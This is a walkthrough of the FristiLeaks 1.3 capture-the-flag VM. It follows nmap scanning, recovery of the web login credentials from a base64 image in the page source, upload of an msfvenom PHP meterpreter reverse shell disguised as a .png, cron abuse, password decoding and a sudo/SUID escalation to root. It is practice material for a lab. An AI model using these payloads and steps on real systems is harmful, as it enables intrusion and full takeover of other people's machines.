FristiLeaks: 1.3 Walkthrough

FristiLeaks is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge
About:
Name: Fristileaks 1.3
Author: Ar0xA
Series: Fristileaks
Style: Enumeration/Follow the breadcrumbs
Goal: get root (uid 0) and read the flag file
Tester(s): dqi, barrebas
Difficulty: Basic
Description:
A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc.. 
VMware users will need to manually edit the VM's MAC address to: 08:00:27:A5:A6:76

Identify the IP address of FristiLeaks machine
Nmap Ping Scan

root@kali:~# nmap -sn 192.168.1.1/24
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-19 14:54 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0032s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.2
Host is up (0.052s latency).
MAC Address: 70:70:0D:C9:AD:78 (Apple)
Nmap scan report for 192.168.1.4
Host is up (0.28s latency).
MAC Address: B4:4B:D2:8C:6F:38 (Apple)
Nmap scan report for 192.168.1.5
Host is up (0.052s latency).
MAC Address: 08:6D:41:BA:BD:EC (Apple)
Nmap scan report for 192.168.1.7
Host is up (0.054s latency).
MAC Address: 70:77:81:C0:6C:33 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.8
Host is up (0.054s latency).
MAC Address: 68:07:15:7A:EC:52 (Intel Corporate)
Nmap scan report for 192.168.1.9
Host is up (0.13s latency).
MAC Address: 54:EA:A8:7A:43:03 (Apple)
Nmap scan report for 192.168.1.11
Host is up (0.00025s latency).
MAC Address: F4:0F:24:33:5E:D1 (Apple)
Nmap scan report for 192.168.1.13
Host is up (0.049s latency).
MAC Address: 68:37:E9:88:16:5F (Amazon Technologies)
Nmap scan report for 192.168.1.43
Host is up (0.00083s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.34
Host is up.
Nmap done: 256 IP addresses (11 hosts up) scanned in 27.63 seconds
root@kali:~#

Identify services running on FristiLeaks

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.43
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-19 14:56 EDT
NSE: Loaded 143 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Initiating NSE at 14:56
Completed NSE at 14:56, 0.00s elapsed
Initiating ARP Ping Scan at 14:56
Scanning 192.168.1.43 [1 port]
Completed ARP Ping Scan at 14:56, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:56
Completed Parallel DNS resolution of 1 host. at 14:56, 0.01s elapsed
Initiating Connect Scan at 14:56
Scanning 192.168.1.43 [65535 ports]
Discovered open port 80/tcp on 192.168.1.43
Connect Scan Timing: About 0.64% done
Connect Scan Timing: About 1.42% done; ETC: 16:07 (1:10:35 remaining)
Connect Scan Timing: About 2.29% done; ETC: 16:02 (1:04:34 remaining)
Connect Scan Timing: About 3.25% done; ETC: 15:58 (0:59:57 remaining)
Connect Scan Timing: About 4.26% done; ETC: 15:55 (0:56:35 remaining)
Connect Scan Timing: About 5.44% done; ETC: 15:52 (0:53:21 remaining)
Connect Scan Timing: About 6.80% done; ETC: 15:49 (0:50:14 remaining)
Connect Scan Timing: About 8.26% done; ETC: 15:47 (0:47:23 remaining)
Connect Scan Timing: About 9.73% done; ETC: 15:45 (0:44:40 remaining)
Connect Scan Timing: About 11.39% done; ETC: 15:42 (0:41:21 remaining)
Connect Scan Timing: About 13.19% done; ETC: 15:40 (0:38:56 remaining)
Connect Scan Timing: About 14.89% done; ETC: 15:39 (0:36:41 remaining)
Connect Scan Timing: About 17.11% done; ETC: 15:37 (0:34:29 remaining)
Connect Scan Timing: About 19.49% done; ETC: 15:36 (0:32:18 remaining)
Connect Scan Timing: About 21.99% done; ETC: 15:34 (0:30:13 remaining)
Connect Scan Timing: About 25.81% done; ETC: 15:34 (0:28:13 remaining)
Connect Scan Timing: About 28.63% done; ETC: 15:32 (0:26:05 remaining)
Connect Scan Timing: About 53.81% done; ETC: 15:16 (0:09:25 remaining)
Completed Connect Scan at 15:07, 688.20s elapsed (65535 total ports)
Initiating Service scan at 15:07
Scanning 1 service on 192.168.1.43
Completed Service scan at 15:07, 6.01s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.1.43
Retrying OS detection (try #2) against 192.168.1.43
adjust_timeouts2: packet supposedly had rtt of -594308 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -594308 microseconds. Ignoring time.
NSE: Script scanning 192.168.1.43.
Initiating NSE at 15:07
Completed NSE at 15:07, 0.12s elapsed
Initiating NSE at 15:07
Completed NSE at 15:07, 0.00s elapsed
Nmap scan report for 192.168.1.43
Host is up (0.00058s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 2.6.X|3.X (90%), Synology DiskStation Manager 5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1
Aggressive OS guesses: Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (87%), Linux 2.6.32 - 3.10 (85%), Linux 2.6.32 - 3.13 (85%), Synology DiskStation Manager 5.1 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.015 days (since Fri May 19 14:45:37 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=240 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms 192.168.1.43
NSE: Script Post-scanning.
Initiating NSE at 15:07
Completed NSE at 15:07, 0.00s elapsed
Initiating NSE at 15:07
Completed NSE at 15:07, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 700.83 seconds
Raw packets sent: 112 (9.108KB) | Rcvd: 2541 (344.776KB)
root@kali:~#

Running nikto and dirb gives us nothing interesting. Lets have a look at robots.txt

All these directories show us have nothing interesting to offer except this 👿

Cola, Sisi, Beer are all drinks. As the name of the vm is FristiLeaks we go ahead and access the /fristi.

The page source seemed interesting

<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it."> <!--  TODO: We need to clean this up for production. I left some junk in here to make testing easier.  - by eezeepz -->
<!-- iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0klS0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+fm63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJZv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvbDpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNdjJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg104VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLqi1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2FgtOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HKul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12qmD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFheEPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJRU5ErkJggg==-->

Lets try and decode the text as base64. The decoded text has a png header so redirect the output into an file.

root@kali:~# cat encoded.txt | base64 --decode > out.png
root@kali:~# file out.png
out.png: PNG image data, 365 x 75, 8-bit/color RGB, non-interlaced
root@kali:~#
http://192.168.1.43/fristi/
Username : eezeepz
Password : keKkeKKeKKeKkEkkEk

Lets upload a shell.

root@kali:~/Desktop/B2R# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes
root@kali:~/Desktop/B2R#

The form restricts us from uploading any php shell as it checks for extension (png/jpeg/gif). Lets upload a shell with the extension png (shell.php.png)

root@kali:~/Desktop/B2R# mv shell.php shell.php.png

The shell has been successfully uploaded. Lets setup the handler before accessing the shell.

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name  Current Setting  Required  Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name   Current Setting  Required  Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id  Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.1.34:4444
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.43
[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.43:46399) at 2017-05-19 16:44:30 -0400
meterpreter > shell
Process 1844 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)

bash-4.1$ uname -a
uname -a
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
bash-4.1$ file /bin/ls
file /bin/ls
/bin/ls: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, stripped

bash-4.1$ cat /etc/redhat-release
cat /etc/redhat-release
CentOS release 6.7 (Final)
bash-4.1$ ls -la

ls -la
total 16
drwxrwxrwx. 2 apache apache 4096 May 19 16:42 .
drwxr-xr-x 3 apache apache 4096 Nov 17 2015 ..
-r--r--r--. 1 apache apache 4 Nov 17 2015 index.html
-rw-r--r-- 1 apache apache 948 May 19 16:42 shell.php.png
bash-4.1$ pwd
pwd
/var/www/html/fristi/uploads

bash-4.1$ cd ../
cd ../
bash-4.1$ ls -la
ls -la
total 172
drwxr-xr-x 3 apache apache 4096 Nov 17 2015 .
drwxr-xr-x. 7 root root 4096 Nov 25 2015 ..
-rw-r--r--. 1 apache apache 1310 Nov 17 2015 checklogin.php
-rw-r--r--. 1 apache apache 1216 Nov 17 2015 do_upload.php
lrwxrwxrwx. 1 apache apache 14 Nov 17 2015 index.php -> main_login.php
-rw-r--r--. 1 apache apache 191 Nov 17 2015 login_success.php
-rw-r--r--. 1 apache apache 45 Nov 17 2015 logout.php
-rw-r--r--. 1 apache apache 1396 Nov 17 2015 main_login.php
-rw-r--r--. 1 apache apache 131736 Nov 17 2015 pic.b64
-rw-r--r--. 1 apache apache 1642 Nov 17 2015 pic2.b64
-rw-r--r--. 1 apache apache 372 Nov 17 2015 upload.php
drwxrwxrwx. 2 apache apache 4096 May 19 16:42 uploads
bash-4.1$ cd ..
cd ..
bash-4.1$ ls -la
ls -la
total 36
drwxr-xr-x. 7 root root 4096 Nov 25 2015 .
drwxr-xr-x. 6 root root 4096 Nov 17 2015 ..
drwxr-xr-x 2 apache apache 4096 Nov 25 2015 beer
drwxr-xr-x 2 apache apache 4096 Nov 25 2015 cola
drwxr-xr-x 3 apache apache 4096 Nov 17 2015 fristi
drwxr-xr-x 2 apache apache 4096 Nov 25 2015 images
-rw-r--r-- 1 apache apache 703 Nov 17 2015 index.html
-rw-r--r-- 1 apache apache 62 Nov 17 2015 robots.txt
drwxr-xr-x 2 apache apache 4096 Nov 25 2015 sisi
bash-4.1$ cd ..
cd ..
bash-4.1$ ls -la
ls -la
total 28
drwxr-xr-x. 6 root root 4096 Nov 17 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
drwxr-xr-x. 2 root root 4096 Aug 24 2015 cgi-bin
drwxr-xr-x. 3 root root 4096 Nov 17 2015 error
drwxr-xr-x. 7 root root 4096 Nov 25 2015 html
drwxr-xr-x. 3 root root 4096 Nov 17 2015 icons
-rw-r--r-- 1 root root 98 Nov 17 2015 notes.txt
bash-4.1$ cat notes.txt
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
bash-4.1$ pwd
pwd
/var/www
bash-4.1$

Lets traverse to eezeepz’s home directory

bash-4.1$ cd /home
cd /home
bash-4.1$ ls -la
ls -la
total 28
drwxr-xr-x. 5 root root 4096 Nov 19 2015 .
dr-xr-xr-x. 22 root root 4096 May 19 14:49 ..
drwx------. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod
bash-4.1$ cd eezeepz
cd eezeepz
bash-4.1$ ls -la
ls -la
total 2608
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .Old
-rw-r--r--. 1 eezeepz eezeepz 18 Sep 22 2015 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz 176 Sep 22 2015 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz 124 Sep 22 2015 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .gnome
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 2015 .settings
-rwxr-xr-x. 1 eezeepz eezeepz 24376 Nov 17 2015 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz 33559 Nov 17 2015 cbq
-rwxr-xr-x. 1 eezeepz eezeepz 6976 Nov 17 2015 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz 56720 Nov 17 2015 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz 25072 Nov 17 2015 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz 52936 Nov 17 2015 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz 31800 Nov 17 2015 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz 48712 Nov 17 2015 chmod
-rwxr-xr-x. 1 eezeepz eezeepz 53640 Nov 17 2015 chown
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 2015 clock
-rwxr-xr-x. 1 eezeepz eezeepz 4808 Nov 17 2015 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 129992 Nov 17 2015 cpio
-rwxr-xr-x. 1 eezeepz eezeepz 38608 Nov 17 2015 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz 5344 Nov 17 2015 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz 41704 Nov 17 2015 cut
-rwxr-xr-x. 1 eezeepz eezeepz 14832 Nov 17 2015 halt
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 hostname
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 2015 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz 7920 Nov 17 2015 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz 11576 Nov 17 2015 kill
-rwxr-xr-x. 1 eezeepz eezeepz 16472 Nov 17 2015 killall5
-rwxr-xr-x. 1 eezeepz eezeepz 32928 Nov 17 2015 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz 11464 Nov 17 2015 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 171784 Nov 17 2015 nano
-rwxr-xr-x. 1 eezeepz eezeepz 5512 Nov 17 2015 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 123360 Nov 17 2015 netstat
-rwxr-xr-x. 1 eezeepz eezeepz 13892 Nov 17 2015 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz 25208 Nov 17 2015 nice
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 4736 Nov 17 2015 nologin
-r--r--r--. 1 eezeepz eezeepz 514 Nov 18 2015 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 390616 Nov 17 2015 tar
-rwxr-xr-x. 1 eezeepz eezeepz 11352 Nov 17 2015 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 249000 Nov 17 2015 tc
-rwxr-xr-x. 1 eezeepz eezeepz 51536 Nov 17 2015 telinit
-rwxr-xr-x. 1 eezeepz eezeepz 47928 Nov 17 2015 touch
-rwxr-xr-x. 1 eezeepz eezeepz 11440 Nov 17 2015 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz 12304 Nov 17 2015 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz 21112 Nov 17 2015 true
-rwxr-xr-x. 1 eezeepz eezeepz 35608 Nov 17 2015 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz 15410 Nov 17 2015 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz 12216 Nov 17 2015 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 504400 Nov 17 2015 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 2015 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 62 Nov 17 2015 zcat
-rwxr-xr-x. 1 eezeepz eezeepz 47520 Nov 17 2015 zic
bash-4.1$ cat notes.txt
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
bash-4.1$

As stated above lets try to make the home directory of admin accessible to all by changing its permissions using chmod placed in /home/admin.

bash-4.1$ echo "/home/admin/chmod -R 777 /home/admin/" > /tmp/runthis
bash-4.1$ cd /tmp
bash-4.1$ ls

cronresult runthis
bash-4.1$ cd /home/admin
bash-4.1$ ls -la
total 652
drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
-rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout
-rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile
-rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc
-rwxrwxrwx 1 admin admin 45224 Nov 18 2015 cat
-rwxrwxrwx 1 admin admin 48712 Nov 18 2015 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxrwxrwx 1 admin admin 90544 Nov 18 2015 df
-rwxrwxrwx 1 admin admin 24136 Nov 18 2015 echo
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 egrep
-rwxrwxrwx 1 admin admin 163600 Nov 18 2015 grep
-rwxrwxrwx 1 admin admin 85304 Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
bash-4.1$ cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

bash-4.1$ cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

bash-4.1$ cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar
@LinkedIn
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
bash-4.1$

Lets decode the string

>>> import base64
>>> in_string = "=RFn0AKnlMHMPIzpyuTI0ITG"
>>> in_string_1 = in_string[::-1]
>>> in_string_2 = in_string_1.encode("rot13")
>>> print base64.b64decode(in_string_2)
LetThereBeFristi!

Lets use this to su as fristigod. The users home directory has interesting files and directories. We come across an SUID binary doCom.

bash-4.1$ su - fristigod
Password: LetThereBeFristi!
-bash-4.1$ id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
-bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ cd
bash-4.1$ pwd

/var/fristigod
bash-4.1$ ls -la
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff

bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit
bash-4.1$ cd .secret_admin_stuff
bash-4.1$ ls -la
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 ..
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom
bash-4.1$ ./doCom
Nice try, but wrong user ;)
bash-4.1$

The user can sudo. Let check the list of commands he can execute as super user.

bash-4.1$ sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...
bash-4.1$

As doCom is an SUID binary and it will run as root, so lets try and run /bin/bash appended with doCom.

bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
[sudo] password for fristigod: LetThereBeFristi!
bash-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
bash-4.1# cd /root
cd /root

bash-4.1# ls
fristileaks_secrets.txt
bash-4.1# cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [
https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
bash-4.1#

Happy Hacking !!!

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.